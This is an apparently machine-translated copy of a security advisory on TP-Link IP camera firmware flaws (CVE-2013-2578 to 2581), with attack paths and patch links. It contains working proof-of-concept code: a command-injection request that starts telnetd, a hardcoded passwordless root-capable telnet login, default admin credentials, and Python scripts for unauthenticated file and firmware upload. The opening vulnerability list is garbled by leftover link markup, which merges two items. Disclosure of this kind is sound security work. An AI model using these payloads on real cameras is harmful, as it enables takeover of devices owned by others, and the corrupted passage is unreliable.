Detailed analysis of multiple TP-Link Network Camera Vulnerabilities

Detailed analysis of multiple TP-Link Network Camera Vulnerabilities
Vulnerability description:
Multiple vulnerabilities are found on the firmware of the TP-LinkTL-SC3171 IP Cameras Network Camera version LM.1.6.18P12 _ sign5, which allows attackers to do the following:
1: [CVE-2013-2578] via file/cgi-bin/admin? Http://www.bkjia.com/kf/ware/vc/ "target =" _ blank "class =" keylink "> vc2vydmv0zxn01rtq0mjo0could/MHuoaM8YnIgLz4NCjKjuls8YSBocmVmPQ =" http://cve.mitre.org/cgi-bin/cvename.cgi? Name = 2013-2579 "target =" _ blank "title =" \ "> CVE-2013-2579] execute arbitrary commands with the shell of the hardcoded identity credential.
3: [CVE-2013-2580] perform unauthenticated remote file upload.
4: [CVE-2013-2581] performs unauthenticated firmware upgrade.
Attack path:
By combining these vulnerabilities, multiple attack paths can be exploited. The extra attack paths are also available, but the attack paths here can help you understand how attackers can compromise the affected devices.
Attack Path 1:
(Verification: None)
1: Upload a root firmware by using the [CVE-2013-2581] vulnerability.
2: restart the device through http: // <ip-cam>/cgi-bin/reboot.
Attack Path 2:
(Verification: bypass)
1: Use http: // <ip-cam>/cgi-bin/hardfactorydefault to reset the device to the factory default setting. Then, the verification is bypassed by using admin: admin as a valid user and password.
2: restart the device through http: // <ip-cam>/cgi-bin/reboot.
3: Enable the Telnet service through the [CVE-2013-2578] vulnerability.
4: Use the user qmik (without a password) to log on to the Telnet service and use the device as the pivot point.
Affected devices and firmware:

TP-Link TL-SC3130 (firmware version LM.1.6.18P12 _ sign5 and below)

TP-Link TL-SC3130G (firmware version LM.1.6.18P12 _ sign5 and below)

TP-Link TL-SC3171 (firmware version M.1.6.18P12 _ sign5 and below)

TP-Link TL-SC3171G (firmware version LM.1.6.18P12 _ sign5 and below)

Other TP-Link network cameras and firmware versions may also be affected.
Supplier information, solutions and solutions:
The link to the beta version patch firmware provided by the vendor is as follows:
[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip
[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip
[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip
[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip
The final official version will be published in the next few days, please contact TP-LINK for more information.
Technical details and PoC:
1: Operating System Command Injection in servetest
The [CVE-2013-2578] File/cgi-bin/admin/servetest has several parameters that can be used for operating system command injection, which causes authenticated users to execute arbitrary commands. The following PoC starts the telnet service:

GET/cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@qHTTP/1.1Accept: */*Accept-Language: en-usReferer: <a href="http://192.168.1.100/progress.htm">http://192.168.1.100/progress.htm</a>If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMTAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;Trident/5.0)Host: 192.168.1.100Proxy-Connection: Keep-AliveCookie: VideoFmt=1Authorization: Basic YWRtaW46YWRtaW4=Content-Length: 2

2: hard-coded identity authentication in the telnet Service
[CVE-2013-2579] the affected system contains a hard-coded login that does not require a password, which causes remote attackers to use this built-in telnet service to log on to the OS, users, and passwords of the affected device:

username: qmik

password: (none)

The qmik user is allowed to execute command su, which causes arbitrary command execution with root permission. The telnet service can be turned on with a [CVE-2013-2578] vulnerability.
3: unauthenticated remote file upload
The [CVE-2013-2580] File/cgi-bin/uploadfile allows unauthenticated users to upload remote files. below is the Python PoC:

import requests fileName = "lala.tmp"f = open(fileName, "w")f.write("lala")f.close()requests.post("<a href="http://192.168.1.100/cgi-bin/uploadfile">http://192.168.1.100/cgi-bin/uploadfile</a>", files={fileName: open(fileName, "rb")})

The uploaded files (lala. tmp in this example) will be placed in the/mnt/mtd directory.
4: unauthenticated remote firmware upgrade
The [CVE-2013-2581] File/cgi-bin/firmwareupgrade allows unauthenticated users to perform remote firmware upgrades, as shown in PythonPoC:

import requests requests.get("<a href="http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset">http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset</a>")fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"cookies={"VideoFmt":"1"}requests.post("<a href="http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset">http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset</a>", files={"SetFWFileName" : (fileName, open(fileName, "rb"))}, cookies=cookies)

Reference:
[1] TP-Link TL-SC3171, http://www.tp-link.com/en/products/details? Categoryid = 230 & model = TL-SC3171.
[2] Security Analysis of IP video surveillance cameras, http://seclists.org/fulldisclosure/2013/Jun/84.
Http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip.
Http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip.
Http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip.
Http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip.
From: http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras#other